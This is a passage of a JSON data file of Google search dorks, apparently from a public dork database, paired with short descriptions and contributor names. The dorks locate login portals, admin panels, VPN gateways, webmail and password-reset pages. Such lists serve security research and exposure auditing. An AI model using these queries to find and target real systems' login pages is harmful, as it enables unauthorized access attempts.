login\"\r\nAuthor: M. Cory Billington\r\nInfo: Contains login portals for Ubiquiti devices running EdgeOS"}, {"dork": "inurl:user_login.php", "description": "Login Portals\r\n\r\nMert Yeniay"}, {"dork": "intitle:\"Web Management Login\"", "description": "Dork: intitle:\"Web Management Login\" \r\nAuthor: M. Cory Billington\r\nInfo: Contains login portals for Brocade switches"}, {"dork": "site:*/users/login_form", "description": "login portal\r\n\r\nsite:*/users/login_form\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/access/unauthenticated", "description": "login portal\r\n\r\nsite:*/access/unauthenticated\r\nsite:*/access/logon/\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:account.*.*/login", "description": "login portal\r\n\r\nsite:account.*.*/login\r\nsite:accounts.*.*/login/\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/quicklogin.php", "description": "login portal\r\n\r\nsite:*/quicklogin.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/auth/login.aspx", "description": "login portal\r\n\r\nsite:*/auth/login.aspx\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/cgi-bin/login.html", "description": "Online devices\r\n\r\nsite:*/cgi-bin/login.html\r\n\r\nReza Abasi(Turku)"}, {"dork": "\"viostor system\"", "description": "online device login page:\r\n\r\n\"viostor system\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:/*:8081/nexus/#welcome -inurl:\"/nexus/content/\"", "description": "Nexus repository Login Portal:\r\nsite:/*:8081/nexus/#welcome -inurl:\"/nexus/content/\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:*admin_login.php", "description": "This Dork Can Be Used To Find Login Pages.\r\n\r\nHere is the Dork: inurl:*admin_login.php"}, {"dork": "inurl:/manage/login.html", "description": "Login Portal:\r\n\r\ninurl:/manage/login.html\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*:8888/login.aspx", "description": "Login Pages:\r\n\r\nsite:*:8888/login.aspx\r\ninurl::8888/login.php\r\ninurl::8888/login.aspx\r\n\r\nReza Abasi"}, {"dork": "site:/*:81 -site:/*:8080 intitle:\"::: Login :::\"", "description": "Login Page for online cams:\r\n\r\nsite:/*:81 -site:/*:8080 intitle:\"::: Login :::\"\r\nsite:/*:88 -site:/*:8080 intitle:\"::: Login :::\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/login.php?do=login\"", "description": "Login page :\r\n\r\ninurl:\"/login.php?do=login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/src/login.php", "description": "Login page :\r\n\r\nsite:*/src/login.php\r\nsite:*/php/login.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/forum/login/", "description": "Forum Login Page:\r\n\r\nsite:*/forum/login/\r\nsite:*/forums/login.php\r\ninurl:\"/forums/login.php?do=lostpw\"\r\nsite:*/forums/admincp/\r\nsite:*/forum/lost-password/\r\nsite:*/forum/lostpassword/\r\nsite:*/forum/login.php?action=forget\r\nsite:*/forum/reset/ intitle:\"Reset password\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/logon/logonpoint/tmindex.html", "description": "Login Page:\r\n\r\nsite:*/logon/logonpoint/tmindex.html\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/logon/ intitle:\"Sign In\"", "description": "Login page :\r\n\r\nsite:*/logon/ intitle:\"Sign In\"\r\nsite:*/logon/ intitle:\"login\"\r\nsite:*/logon/ intitle:\"Logon\" inurl:/Logon.aspx\r\nsite:*/logon/ intitle:\"Logon\" inurl:/logon.html\r\nsite:*/logon/ intitle:\"Logon\" inurl:/logon.jsp\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/sign_in.aspx", "description": "Login page :\r\n\r\nsite:*/sign_in.aspx\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/oaam_server/login.do", "description": "Login page :\r\n\r\ninurl:/oaam_server/login.do\r\nsite:*/login.do intitle:\"Sign On\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Sales Central - Logon\"", "description": "Login page :\r\n\r\nintitle:\"Sales Central - Logon\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:/auth.*.*/login", "description": "Login page :\r\n\r\nsite:/auth.*.*/login\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/admin.login.php", "description": "Login page :\r\n\r\ninurl:/admin.login.php\r\nsite:*/admin.login.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/admin/login.html", "description": "Login page :\r\n\r\nsite:*/admin/login.html\r\nsite:*/admin/Admin-Login.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:admin. intitle:\"admin login\"", "description": "Login page :\r\n\r\ninurl:admin. intitle:\"admin login\"\r\nintitle:\"admin login\" inurl:/admin login\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Calendarix Admin Login\"", "description": "Login page :\r\n\r\nintitle:\"Calendarix Admin Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/admin/cal_login.php", "description": "Login page :\r\n\r\ninurl:/admin/cal_login.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/Login/Admin intitle:\"Admin Login\"", "description": "Login page :\r\n\r\ninurl:/Login/Admin intitle:\"Admin Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/admin-login intitle:\"Admin Login\"", "description": "Login page :\r\n\r\nsite:*/admin-login intitle:\"Admin Login\"\r\ninurl:\"/admin-login?view=reset\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:signin.*.* intitle:\"login\"", "description": "Login page :\r\n\r\nsite:signin.*.* intitle:\"login\"\r\nsite:mail.*.* intitle:\"login\"\r\nsite:signin.*.*/ intitle:\"signin\" -facebook.com\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:sso.*.* intitle:\"Login\"", "description": "Login page :\r\n\r\nsite:sso.*.* intitle:\"Login\"\r\nsite:ssologin.*.* intitle:\"Single sign on\"\r\nsite:*/sso/XUI/#login/\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:admin.*.* intitle:\"Admin Login\"", "description": "Login page :\r\n\r\nsite:admin.*.* intitle:\"Admin Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:login.*.* intitle:\"Admin Login\"", "description": "Login page :\r\n\r\nsite:login.*.* intitle:\"Admin Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/adminLogin/login/", "description": "Login page :\r\n\r\nsite:*/adminLogin/login/\r\nsite:*/Login/adminLogin\r\nsite:*/adminlogin.*\r\ninurl:/adminlogin\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/admin/ intext:\"login\"", "description": "Login page :\r\n\r\ninurl:/admin/ intext:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/admin/admin.php intitle:\"login\"", "description": "Login page :\r\n\r\ninurl:/admin/admin.php intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:member.*.* intitle:\"login\"", "description": "Login page :\r\n\r\nsite:member.*.* intitle:\"login\"\r\nsite:member.*.* intitle:\"signin\"\r\nsite:member.*.* intitle:\"logon\"\r\nsite:*/members.php intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/users/sign_in", "description": "Login page :\r\n\r\ninurl:/users/sign_in\r\ninurl:/users/login\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/member/login", "description": "Login page :\r\n\r\ninurl:/member/login\r\ninurl:/member/signin OR inurl:/member-signin/\r\ninurl:/member/logon\r\ninurl:\"/member.php?action=activate\"\r\ninurl:\"/member.php\" intitle:\"Login\"\r\ninurl:/memberlogin\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/account/logon intitle:\"Log On\"", "description": "Login Pages:\r\n\r\ninurl:/account/logon intitle:\"Log On\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/account/signin intitle:\"signin\"", "description": "Login Pages:\r\n\r\ninurl:/account/signin intitle:\"signin\"\r\n\r\nReza Abasi(Turku"}, {"dork": "inurl:/wp-admin/admin.php intitle:\"Log In\"", "description": "wordpress Login Pages:\r\n\r\ninurl:/wp-admin/admin.php intitle:\"Log In\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:mail.*.*/auth", "description": "Login Pages:\r\n\r\nsite:mail.*.*/auth\r\nsite:login.*.*/auth\r\nsite:signin.*.*/auth\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/pages/login.php intitle:\"Login\"", "description": "Login Pages:\r\n\r\nsite:*/pages/login.php intitle:\"Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/en/login/", "description": "Login Pages:\r\n\r\nsite:*/en/login/\r\n\r\nReza Abasi"}, {"dork": "site:vpn.*.*/ intitle:\"login\"", "description": "VPN Login Pages:\r\n\r\nsite:vpn.*.*/ intitle:\"login\"\r\n\r\nReza Abasi"}, {"dork": "site:*/index.php/login intitle:\"login\"", "description": "Login Page:\r\n\r\nsite:*/index.php/login intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Login page\" intext:\"about SurgeMail\"", "description": "Login Page:\r\n\r\nintitle:\"Login page\" intext:\"about SurgeMail\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/cgi/user.cgi", "description": "Login Page:\r\n\r\nsite:*/cgi/user.cgi\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/Webmail/", "description": "Login Page:\r\n\r\nsite:*/Webmail/\r\nsite:Webmail.*.*/owa/\r\nsite:Webmail.*.*/ intitle:\"login\"\r\nsite:webmail.*.* intitle:\"Webmail Login\"\r\nsite:mail.*.* intitle:\"login\"\r\n\r\nReza Abasi"}, {"dork": "intitle:\"Local Run Manager\" intext:\"Local Run Manager Version:\"", "description": "Dork: intitle:\"Local Run Manager\" intext:\"Local Run Manager Version:\"\r\n\r\nAuthor: M. Cory Billington\r\n\r\nInfo: Web portals for Local Run Manager software from Illumina"}, {"dork": "site:identity.*.*/login", "description": "Login Page:\r\n\r\nsite:identity.*.*/login\r\nsite:imap.*.*/login\r\nsite:smtp.*.*/login\r\nsite:store.*.*/login\r\nmy.*.*/login\r\nsite:management.*.*/login\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:please login inurl:remote/login intext:FortiToken", "description": "Fortinet (FortiToken Mobile OTP auth application) login pages\r\n\r\n# Google Dorks: \r\nintitle:please login inurl:remote/login intext:FortiToken\r\nintitle:please login inurl:remote/login intext:FortiClient\r\nintext:Please Login SSL VPN inurl:remote/login intext:FortiClient\r\nintext:Please Login SSL VPN inurl:remote/login intext:FortiToken\r\n\r\n# Date: [21-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "site:*/Password.aspx", "description": "Reset Password Page:\r\n\r\nsite:*/Password.aspx\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/forgetpassword.php", "description": "Login Page and Reset password Page:\r\n\r\nsite:*/forgetpassword.php\r\nsite:*/login/forget_password.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:dotCMS inurl:dotAdmin", "description": "DotCMS login pages\r\n\r\n# Google Dork: intitle:dotCMS inurl:dotAdmin\r\n# Date: [22-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "intitle:synology intext:\"Choose login account:\"", "description": "NAS Device login\r\n\r\n# Google Dork: intitle:synology intext:\"Choose login account:\"\r\n# Date: [22-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "site:*.*.*/authentication/Logon", "description": "Login Pages:\r\n\r\nsite:*.*.*/authentication/Logon\r\nsite:*.*.*/authentication intitle:\"sign in\"\r\nsite:authentication.*.*/login\r\n\r\nReza Abasi"}, {"dork": "site:secure.*.* intitle:\"log in\"", "description": "Login Portal:\r\n\r\nsite:secure.*.* intitle:\"log in\"\r\nsite:secure.*.* intitle:\"sign in\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:sts.*.*/adfs/ls/?SAMLRequest= intitle:\"sign in\"", "description": "Login Page:\r\n\r\nsite:sts.*.*/adfs/ls/?SAMLRequest= intitle:\"sign in\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/web-hosting/cplogin", "description": "login page:\r\n\r\nsite:*/web-hosting/cplogin\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/?action=login\" intitle:\"Log In\"", "description": "Login Portal:\r\n\r\ninurl:\"/?action=login\" intitle:\"Log In\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/EasyPAY/view", "description": "Payroll management login pages\r\n\r\n# Google Dork: inurl:/EasyPAY/view\r\n# Date: [23-08-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "site:*/account-sign-in", "description": "Login Portal:\r\n\r\nsite:*/account-sign-in\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/login/ForgotPassword", "description": "Login for password reset:\r\n\r\nsite:*/login/ForgotPassword\r\nsite:*/login/pw/request\r\nsite:*/login/forgot-password\r\n/login/forgot\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:admin.*.*/forgot?username=", "description": "Login for password reset:\r\n\r\nsite:admin.*.*/forgot?username=\r\nsite:*/admin/password/reset\r\nsite:*/admin/login/forgot\r\nsite:*/admin/pass\r\nsite:*/admin/password/\r\ninurl:\"/index.php/lostpassword/\"\r\ninurl:\"index.php?login/forgot_password\"\r\nsite:*/auth/v2/login/password_reset\r\nsite:*/seller/forgot/\r\nsite:*/recoverpassword\r\n\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/wp-login?redirect_to= intitle:\"login\"", "description": "Login Page:\r\n\r\nsite:*/wp-login?redirect_to= intitle:\"login\"\r\ninurl:/wordpress/wp-login?action=lostpassword -site:stackexchange.com\r\ninurl:\"/wp-login.php?redirect_to=\" intitle:\"Log In\"\r\ninurl:\"/wp-login.php?action=lostpassword\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/identify/ intitle:\"Forgotten Password\"", "description": "Login Pages:\r\n\r\ninurl:/identify/ intitle:\"Forgotten Password\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/admincp/ intitle:\"Admin Cp\"", "description": "Login Portal:\r\n\r\nsite:*/admincp/ intitle:\"Admin Cp\"\r\nsite:*/admincp/login.php\r\nsite:*/UserCP intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/user/password/", "description": "Login Page:\r\n\r\nsite:*/user/password/\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/index.php/admin/ intitle:\"login\"", "description": "Login Portal:\r\n\r\ninurl:/index.php/admin/ intitle:\"login\"\r\ninurl:/index.php/admin-login/ intitle:\"Admin login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:ftp://ftp.*.*/login -inurl:https://", "description": "Login Portals:\r\n\r\nsite:ftp://ftp.*.*/login -inurl:https://\r\n\r\nReza ABasi(Turku)"}, {"dork": "site:*/securelogin.asp", "description": "Login Portal:\r\n\r\nsite:*/securelogin.asp\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/authlogin/ intitle:login", "description": "Login Portal:\r\n\r\nsite:*/authlogin/ intitle:login\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/exchange-login/ intitle:\"Login\"", "description": "Login Pages:\r\n\r\nsite:*/exchange-login/ intitle:\"Login\"\r\nsite:*exchange.*/login\r\nsite:exchange.*.*/login.aspx\r\nintitle:\"Exchange LogIn\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/m-login.html", "description": "Login Portal:\r\n\r\nsite:*/m-login.html\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/Security/Login", "description": "Login Portal:\r\n\r\nsite:*/Security/Login\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/updatepassword.php", "description": "Login Portal:\r\n\r\nsite:*/updatepassword.php\r\nsite:*/lost-password\r\nsite:*/changepassword.php\r\nsite:*/forgotpw.php\r\nsite:*/reset-password\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/validar_usuario.php", "description": "Login Portal:\r\n\r\nsite:*/validar_usuario.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Login to Webmin\" intext:\"You must enter a username and password to login to the server\"", "description": "Dork: intitle:\"Login to Webmin\" intext:\"You must enter a username and\r\npassword to login to the server\"\r\n\r\nAuthor: M. Cory Billington (@_th3y)\r\n\r\nInfo: WebMin Login portals"}, {"dork": "site:monitor.*.*/login intitle:\"Login\"", "description": "Login Portal:\r\nsite:monitor.*.*/login intitle:\"Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:management.*.*/login/", "description": "Login Portal:\r\n\r\nsite:management.*.*/login/\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:moodle.*.*/login", "description": "Login Portal:\r\n\r\nsite:moodle.*.*/login/\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/SendPassword", "description": "Login Portal:\r\nsite:*/SendPassword\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:intranet.*.*/login/", "description": "Login Portal:\r\n\r\nsite:intranet.*.*/login/\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:admin/changepassword*", "description": "Google Dork: \r\ninurl:admin/changepassword*\r\ninurl:admin/resetpassword*\r\n\r\nCategory: Pages Containing Login Portals\r\nDescription: This Dork will find 'change-password' pages.\r\n\r\n(Note: Platform Not Matters && i.e .php, .aspx, .net etc..)\r\n\r\n\r\nAuthor:Abhishek Samaddar"}, {"dork": "site:*/password_reset/", "description": "Login Portal:\r\n\r\nsite:*/password_reset/\r\nsite:*/password/reset\r\nsite:*/passwordrecovery\r\nsite:*/resetpassword.html\r\nsite:*/user/request-password-reset/\r\nsite:*/resetpass.html\r\nsite:*/forum/reset intitle:\"Reset Password\"\r\nsite:*/PasswordReset.aspx\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*:8000/login#forgot intitle:\"login\"", "description": "Login portal:\r\n\r\nsite:*:8000/login#forgot intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:auth.*.*/signin", "description": "Login Portal:\r\n\r\nsite:auth.*.*/signin\r\nsite:*/auth/login intitle:\"signin\"\r\nsite:*/auth.php\r\nsite:signin.*.* intitle:\"signin\" -facebook.com\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/forgot-password", "description": "Login Portals:\r\n\r\nsite:*/forgot-password\r\nsite:*/password-forget\r\ninurl:\"/?forgot_password=yes\"\r\nsite:*/password-recovery\r\ninurl:\"wp-login.php?action=lostpassword\"\r\nsite:*/auth/reset_password/\r\nsite:*/login/# intext:\"Reset Password\"\r\nsite:*/forgot\r\ninurl:\"/forgotpassword.jsp?locale=us\"\r\nsite:*/passwordReset\r\nsite:*/pwdreset\r\nsite:*/login/reset.html\r\ninurl:\"forgotmypassword.html\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/resetpassword.php", "description": "To View ResetPassword Portals of various websites\r\n*Dork: site:*/resetpassword.php*\r\n*Author: Paras Arora*\r\n*Date: 3rd September 2019 *\r\n*Category: Pages Containing Reset Portals*"}, {"dork": "inurl:show_port_res_settings", "description": "Google Dork Submission for finding Mitel Audio and Web Conferencing login pages.\r\n\r\nAuthor name: MiningOmerta"}, {"dork": "site:exchange.*.*/owa/", "description": "Login Portal:\r\n\r\nsite:exchange.*.*/owa/\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:remote.*.* intitle:\"User Authentication\"", "description": "Login portal:\r\n\r\nsite:remote.*.* intitle:\"User Authentication\"\r\nintitle:\"User Authentication\" site:*/sslvpn_logon.shtml\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/awcuser*", "description": "An additional dork for finding Mitel login screens, previous presentations, and documents.\r\n\r\nAuthor Name: MiningOmerta"}, {"dork": "intitle:login enterprise", "description": "Enterprise login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "site:*/recover-pass", "description": "Login Portal:\r\n\r\nsite:*/recover-pass\r\nsite:*/users/recover_password\r\nsite:controlpanel.*.*/recover.cgi\r\ninurl:\"/login/#forgotpin\"\r\nsite:*/password/email\r\ninurl:\"/plug.php?e=passrecover\"\r\ninurl:\"/index.php?action=recover_password\"\r\nsite:*/password/new\r\nsite:*/reminder.php\r\nsite:cpanel.*.* inurl:\"/resetpass?start=1\"\r\n\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:smtp.*.*/login", "description": "Login Portal:\r\n\r\nsite:smtp.*.*/login\r\nsite:owa.*.*/login\r\nsite:controlpanel.*.*/login\r\nsite:pop.*.*/login\r\nsite:ww1.*.*/login\r\nsite:support.*.*/login\r\nsite:app.*.*/login\r\nsite:*/Admin/Login/\r\nsite:auth.*.*/login\r\nsite:imap.*.* intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:dev.*.*/signin", "description": "Google Dork Submission for finding developers login pages for various places.\r\n\r\nsite:dev.*.*/signin\r\nsite:account.*.*/signin\r\n\r\nAuthor: MiningOmerta"}, {"dork": "site:app.*.*/ intext:login", "description": "#Google Dork for more login pages, sometimes for internal apps.\r\n\r\n\r\n#Author: MiningOmerta"}, {"dork": "site:*/nms/login intitle:\"UNMS\"", "description": "Login Portal:\r\n\r\nsite:*/nms/login intitle:\"UNMS\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/phpmyadmin/user_password.php\" -inurl:git", "description": "Login Portal:\r\n\r\ninurl:\"/phpmyadmin/user_password.php\" -inurl:git\r\nsite:*/phpmyadmin/sql.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/SecureAuth.aspx\"", "description": "Login Portal:\r\n\r\ninurl:\"/SecureAuth.aspx\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"XENON :: Login\"", "description": "Login Portal:\r\n\r\nintitle:\"XENON :: Login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/index_signin.php", "description": "Login Portal:\r\n\r\nsite:*/index_signin.php\r\nsite:*/sign-in intitle:\"Sign in\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/authUpdate intitle:\"Account Access Help\"", "description": "Login Portal:\r\n\r\nsite:*/authUpdate intitle:\"Account Access Help\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/usp-core/app/authUpdate\"", "description": "Login Portal:\r\n\r\ninurl:\"/usp-core/app/authUpdate\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*:8443/login_up.php", "description": "Google Dork Submission to find login pages for Plesk Onyx sites, usually ftp servers.\r\n\r\nhttps://www.google.com/search?q=site:*:8443/login_up.php\r\n\r\nAuthor: MiningOmerta"}, {"dork": "intext:\"Please log on to use the mikrotik hotspot service\" intitle:\"mikrotik hotspot >login\" -github -site:mikrotik.com", "description": "mikrotik hotspot login:\r\n\r\nintext:\"Please log on to use the mikrotik hotspot service\"\r\nintitle:\"mikrotik hotspot >login\" -github -site:mikrotik.com\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:cpanel.*.* intitle:\"login\" -site:forums.cpanel.net", "description": "Login Portal:\r\n\r\nsite:cpanel.*.* intitle:\"login\" -site:forums.cpanel.net\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"login\" site:welcome.*.*", "description": "Login Portal:\r\n\r\nintitle:\"login\" site:welcome.*.*\r\nsite:email.*.* intitle:\"login\"\r\nsite:host.*.* intitle:\"login\"\r\nsite:mailserver.*.* intitle:\"login\"\r\nsite:ns.*.* intitle:\"login\"\r\nsite:ns1.*.* intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/casAuthn/login.php", "description": "Login Page:\r\n\r\nsite:*/casAuthn/login.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/authzssl/forget_password", "description": "Login Portal:\r\n\r\nsite:*/authzssl/forget_password\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:* intitle:\"reset password\"", "description": "*DORK: *site:* intitle:\"reset password\"\r\n*AUTHOR: Paras Arora(PAC Security)*\r\n*DATE: 17 September 2019*\r\n*Category: reset password portals*"}, {"dork": "inurl:webmail/src/login.php", "description": "SquirrelMail - Login portal:\r\n\r\ninurl:webmail/src/login.php\r\n\r\n\r\nSravan7s"}, {"dork": "inurl:\"/prweb/prwebLDAP1/\"", "description": "Pega systems: login portal\r\n\r\ninurl:\"/prweb/prwebLDAP1/\"\r\n\r\nSravan7s"}, {"dork": "site:*/oauth2/authorize", "description": "Login Portal:\r\n\r\nsite:*/oauth2/authorize\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/pwdform.htm", "description": "Login Portal:\r\n\r\nsite:*/pwdform.htm\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/wp-admin/user-edit.php", "description": "Login Portal:\r\n\r\nsite:*/wp-admin/user-edit.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/dana-na/ filetype:cgi", "description": "# Exploit Title: Pulse Secure SSL VPN\r\n\r\n# Google Dork: inurl:/dana-na/ filetype:cgi\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "site:*/request-password-reset", "description": "Login Portals:\r\n\r\nsite:*/request-password-reset\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/account/preferences", "description": "Login Portal:\r\n\r\nsite:*/account/preferences\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"apex/f?p=\"", "description": "Login portals"}, {"dork": "site:*/oauth/authenticate", "description": "Login Portal:\r\n\r\nsite:*/oauth/authenticate\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?route=account/login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?route=account/login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?gt=member/login\"", "description": "Login POrtal:\r\n\r\ninurl:\"/index.php?gt=member/login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?r=site/login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?r=site/login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php/site/login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php/site/login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/userlogin", "description": "Login Portal:\r\n\r\ninurl:/userlogin\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/customerlogin", "description": "Login Portal:\r\n\r\ninurl:/customerlogin\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/clientlogin", "description": "Login Portals:\r\n\r\ninurl:/clientlogin\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/studentlogin", "description": "Login Portal:\r\n\r\ninurl:/studentlogin\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/stafflogin", "description": "Login POrtal:\r\n\r\ninurl:/stafflogin\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/usercp.php", "description": "Login Portal:\r\n\r\nsite:*/usercp.php\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?page=login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?page=login\"\r\ninurl:\"/index.php?page=changepass\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/loginportal/ intitle:\"login\"", "description": "Login Portal:\r\n\r\nsite:*/loginportal/ intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/index.php?action=login\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?action=login\"\r\ninurl:\"/index.php?section=login\"\r\ninurl:\"/index.php/login?view=reset\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/password/remind", "description": "Login Portal:\r\n\r\nsite:*/password/remind\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"BasicAuthenticator:LOCAL\"", "description": "Login portals."}, {"dork": "inurl:\"/showLogin.cc?isMobile=false\"", "description": "Login portals"}, {"dork": "site:*/Dashboard/ intitle:\"login\"", "description": "Login Portals:\r\n\r\nsite:*/Dashboard/ intitle:\"login\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:watch.*.*/login", "description": "Login Portal:\r\n\r\nsite:watch.*.*/login\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"API Publisher- Login\"", "description": "Dork: intitle:\"API Publisher- Login\"\r\n\r\nAuthor: M. Cory Billington (@_th3y)\r\n\r\nInfo: WSO2 Login portals"}, {"dork": "site:passport.*.*/login", "description": "Login Portal:\r\n\r\nsite:passport.*.*/login\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/account/lost_password", "description": "Login Portal:\r\n\r\nsite:*/account/lost_password\r\nsite:*/account/forgot-password\r\nsite:*/account/request-password-reset\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"/wp-login.php?action=lostpassword\"", "description": "Login Portal:\r\n\r\ninurl:\"/wp-login.php?action=lostpassword\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Pandora FMS mobile\"", "description": "# Dork #\r\n\r\nintitle:\"Pandora FMS mobile\"\r\n\r\nLogin Portals."}, {"dork": "site:*/cb-forgot-login", "description": "Login POrtal:\r\n\r\nsite:*/cb-forgot-login\r\n\r\nReza Abasi(Turku)"}, {"dork": "redash inurl:/org_slug", "description": "Redash Dashboard logins\r\n\r\n# Google Dork: redash inurl:/org_slug\r\n# Date: [4-11-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "inurl:/webconsole/webpages/login.jsp", "description": "Sophos XG Firewall Login pages\r\n\r\n# Google Dork: inurl:/webconsole/webpages/login.jsp\r\n# Date: [5-11-2019]\r\n# Author: [Mohammed*_*]"}, {"dork": "inurl:.elasticbeanstalk.com/admin", "description": 